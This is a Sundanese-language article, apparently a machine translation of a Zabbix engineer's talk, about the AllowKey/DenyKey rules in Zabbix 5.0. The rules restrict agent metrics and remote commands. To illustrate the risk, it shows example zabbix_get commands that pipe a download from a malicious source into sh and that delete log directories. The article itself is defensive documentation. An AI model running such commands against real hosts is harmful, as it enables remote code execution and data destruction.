Pangrojong daptar hideung sareng daptar bodas pikeun métrik sisi agén dina Zabbix 5.0

Pangrojong daptar hideung sareng daptar bodas pikeun métrik sisi agén

Tikhon Uskov, Insinyur integrasi, Zabbix

Masalah kaamanan data

Zabbix 5.0 ngagaduhan fitur énggal anu ngamungkinkeun anjeun ningkatkeun kaamanan dina sistem nganggo Zabbix Agent sareng ngagentos parameter lami. EnableRemoteCommands.

Perbaikan dina kaamanan sistem dumasar-agén asalna tina kanyataan yén agén tiasa ngalakukeun sajumlah ageung tindakan anu berpotensi bahaya.

• Agén tiasa ngumpulkeun ampir sadaya inpormasi, kalebet inpormasi rahasia atanapi anu berpotensi bahaya, tina file konfigurasi, file log, file sandi, atanapi file anu sanés.

Salaku conto, nganggo utilitas zabbix_get anjeun tiasa ngaksés daptar pangguna, diréktori bumi, file sandi, jsb.

Ngaksés data nganggo utilitas zabbix_get

CATETAN. Data ngan bisa dimeunangkeun lamun agén geus maca idin dina file pakait. Tapi, contona, file /etc/passwd/ bisa dibaca ku sakabéh pamaké.

• Agén ogé tiasa ngalaksanakeun paréntah anu berpotensi bahaya. Contona, konci *system.run[]** ngidinan Anjeun pikeun ngaéksekusi sagala paréntah jauh dina titik jaringan, kaasup ngajalankeun Aksara tina panganteur web Zabbix nu ogé ngajalankeun paréntah di sisi agén.

# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]

# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]

• Dina Linux, agén dijalankeun sacara standar tanpa hak istimewa root, sedengkeun dina Windows dijalankeun salaku jasa salaku Sistem sareng gaduh aksés anu teu terbatas kana sistem file. Sasuai, lamun euweuh parobahan dijieun kana parameter Zabbix Agén sanggeus instalasi, agén boga aksés ka pendaptaran, sistem file na bisa ngaéksekusi queries WMI.

Dina versi saméméhna parameter EnableRemoteCommands=0 ngan ukur diidinan nganonaktipkeun métrik kalayan konci *system.run[]** sareng ngajalankeun skrip tina antarmuka wéb, tapi teu aya cara pikeun ngawatesan aksés kana file individu, ngawenangkeun atanapi nganonaktipkeun konci individu anu dipasang sareng agén, atanapi ngabatesan pamakean parameter individu.

Ngagunakeun parameter EnableRemoteCommand dina versi Zabbix saméméhna

AllowKey / DenyKey

Zabbix 5.0 mantuan ngajaga ngalawan aksés diidinan misalna ku nyadiakeun whitelists na blacklists pikeun ngidinan sarta denying metrics di sisi agén.

Dina Zabbix 5.0 sadaya konci, kalebet *system.run[]** diaktipkeun, sarta dua pilihan konfigurasi agén anyar geus ditambahkeun:

AllowKey= - cék diidinan;

DenyKey= - cék dilarang;

dimana mangrupakeun pola ngaran konci kalayan parameter anu ngagunakeun metacharacters (*).

Konci AllowKey sareng DenyKey ngamungkinkeun anjeun ngawenangkeun atanapi nolak métrik individu dumasar kana pola anu khusus. Teu kawas parameter konfigurasi sejen, jumlah parameter AllowKey / DenyKey teu diwatesan. Ieu ngidinan Anjeun pikeun jelas ngartikeun naon kahayang agén tiasa ngalakukeun dina sistem ku nyieun tangkal cék - konci laksana, dimana urutan nu aranjeunna ditulis muterkeun hiji peran anu kacida penting.

Runtuyan aturan

Aturan dipariksa dina urutan nu aranjeunna diasupkeun kana file konfigurasi. Konci dipariksa dumasar kana aturan sateuacan pertandingan kahiji, sareng pas konci unsur data cocog sareng pola, éta diidinan atanapi ditolak. Sanggeus ieu, mariksa aturan eureun jeung konci sésana teu dipaliré.

Ku alatan éta, lamun hiji unsur cocog duanana mangrupa ngidinan sarta mungkir aturan, hasilna bakal gumantung kana aturan mana anu munggaran dina file konfigurasi.

2 aturan anu béda sareng pola anu sami sareng konci vfs.file.size[/tmp/file]

Urutan ngagunakeun konci AllowKey/DenyKey:

1. aturan anu tepat,
2. aturan umum,
3. aturan ngalarang.

Salaku conto, upami anjeun peryogi aksés kana file dina polder anu tangtu, anjeun kedah mimiti ngijinkeun aksés ka aranjeunna, teras mungkir sadayana anu henteu aya dina idin anu ditetepkeun. Upami aturan nolak dianggo heula, aksés kana polder bakal ditolak.

Runtuyan anu bener

Upami anjeun kedah ngijinkeun 2 utilitas ngajalankeun via *system.run[]**, jeung aturan denying bakal dieusian heula, utiliti moal dibuka, sabab pola kahiji bakal salawasna cocog sagala konci, sarta aturan saterusna bakal dipaliré.

Runtuyan salah

Pola

aturan dasar

Pola mangrupa ekspresi kalawan wildcards. Metakarakter (*) cocog sareng nomer naon waé karakter dina posisi anu khusus. Metakarakter tiasa dianggo dina nami konci sareng dina parameter. Contona, anjeun tiasa sacara saksama nangtukeun parameter munggaran kalayan téks, jeung nangtukeun hiji saterusna salaku wildcard.

Parameter kudu diapit ku kurung pasagi [].

• system.run[* - salah
• vfs.file*.txt] - salah
• vfs.file.*[*] - leres

Conto ngagunakeun wildcard.

1. Dina nami konci sareng dina parameter. Dina hal ieu, konci henteu pakait sareng konci anu sami anu henteu ngandung parameter, sabab dina pola kami nunjukkeun yén urang hoyong nampi tungtung anu tangtu tina nami konci sareng set parameter anu tangtu.
2. Upami pola henteu nganggo kurung kuadrat, pola éta ngamungkinkeun sadaya konci anu henteu ngandung parameter sareng nampik sadaya konci anu ngandung parameter anu ditangtukeun.
3. Lamun konci ditulis dina pinuh sarta parameter anu dieusian salaku wildcard, eta bakal cocog sagala konci sarupa jeung parameter wae tur moal cocog konci tanpa kurung kuadrat, ie bakal diwenangkeun atawa ditolak.

Aturan keur ngeusian kaluar parameter.

• Upami konci sareng parameter dimaksudkeun pikeun dianggo, parameterna kedah disebatkeun dina file konfigurasi. Parameter kudu dieusian salaku metacharacter a. Perlu sacara saksama nampik aksés kana file naon waé sareng tumut kana inpormasi naon anu tiasa disayogikeun ku métrik dina ejaan anu béda - nganggo sareng tanpa parameter.

Fitur nulis konci kalayan parameter

• Lamun konci anu dieusian ku parameter, tapi parameter anu pilihan jeung dieusian salaku metacharacter a, konci tanpa parameter bakal direngsekeun. Contona, upami anjeun hoyong nganonaktipkeun narima informasi ngeunaan beban dina CPU jeung nangtukeun yén system.cpu.load [*] konci kudu ditumpurkeun, ulah poho yén konci tanpa parameter bakal balik nilai beban rata.

Aturan pikeun ngeusian parameter

Catetan

carana ngatur

• Sababaraha aturan teu bisa dirobah ku pamaké, contona, aturan kapanggihna atawa aturan pendaptaran otomatis agén. Aturan AllowKey/DenyKey henteu mangaruhan parameter ieu:
  - HostnameItem
  - HostMetadataItem
  - HostInterfaceItem

CATETAN. Upami kuncén nganonaktipkeun konci, nalika ditaros, Zabbix henteu masihan inpormasi ngeunaan naha métrik atanapi konci digolongkeun kana kategori 'Teu dirojong'. Inpormasi ngeunaan larangan pikeun ngalaksanakeun paréntah jauh ogé henteu ditingalikeun dina file log agén. Ieu kanggo alesan kaamanan, tapi tiasa ngahesekeun debugging upami métrik digolongkeun kana kategori anu henteu didukung ku sababaraha alesan.

• Anjeun teu kedah ngandelkeun sagala urutan husus pikeun nyambungkeun file konfigurasi éksternal (contona, dina urutan abjad).

Paréntah Line Utiliti

Saatos nyetél aturan, anjeun kedah mastikeun yén sadayana dikonpigurasi leres.

Anjeun tiasa nganggo salah sahiji tina tilu pilihan:

• Tambahkeun métrik ka Zabbix.
• Test kalawan zabbix_agentd. agén Zabbix kalawan pilihan -nyitak (-p) nembongkeun sagala kenop (nu diwenangkeun sacara standar) iwal nu teu diwenangkeun ku konfigurasi nu. Sareng sareng pilihan -uji (-t) pikeun konci terlarang bakal balik 'Konci item teu dirojong'.
• Test kalawan zabbix_get. Utiliti zabbix_get kalawan pilihan -k bakal balik'ZBX_NOTSUPPORTED: Métrik teu dipikanyaho'.

Ngidinan atawa mungkir

Anjeun tiasa nampik aksés kana file sareng pariksa, contona, nganggo utilitas zabbix_getyén aksés ka file ditolak.

**

CATETAN. Tanda kutip dina parameter teu dipaliré.

Dina hal ieu, aksés ka file sapertos kitu tiasa diidinan ngalangkungan jalur anu béda. Contona, upami symlink ngabalukarkeun eta.

Disarankeun mariksa rupa-rupa pilihan pikeun nerapkeun aturan anu ditetepkeun, sareng ogé tumut kana kamungkinan ngajauhan larangan.

Patarosan na waleran

patarosan. Naha ieu pola kompléks misalna kalawan basa sorangan dipilih pikeun ngajelaskeun aturan, idin jeung larangan? Naha éta henteu mungkin ngagunakeun, contona, ungkapan biasa anu dianggo Zabbix?

jawaban. Ieu mangrupikeun masalah kinerja regex sabab biasana ngan ukur hiji agén sareng mariksa sajumlah métrik. Regex mangrupikeun operasi anu cukup beurat sareng kami henteu tiasa pariksa rébuan métrik ku cara ieu. Wildcards - solusi universal, loba dipaké tur basajan.

patarosan. Naha file Include henteu kalebet dina urutan abjad?

jawaban. Sajauh anu kuring terang, ampir teu mungkin pikeun ngaduga urutan aturan anu bakal diterapkeun upami anjeun nyebarkeun aturan kana file anu béda. Abdi nyarankeun ngumpulkeun sadaya aturan AllowKey / DenyKey dina hiji file Include, sabab saling berinteraksi, sareng kalebet file ieu..

patarosan. Dina Zabbix 5.0 pilihan 'EnableRemoteCommands=' leungit tina file konfigurasi, sareng ngan AllowKey / DenyKey anu sayogi?

Waleran. Sumuhun leres.

Hatur nuhun kanggo nengetan!

sumber: www.habr.com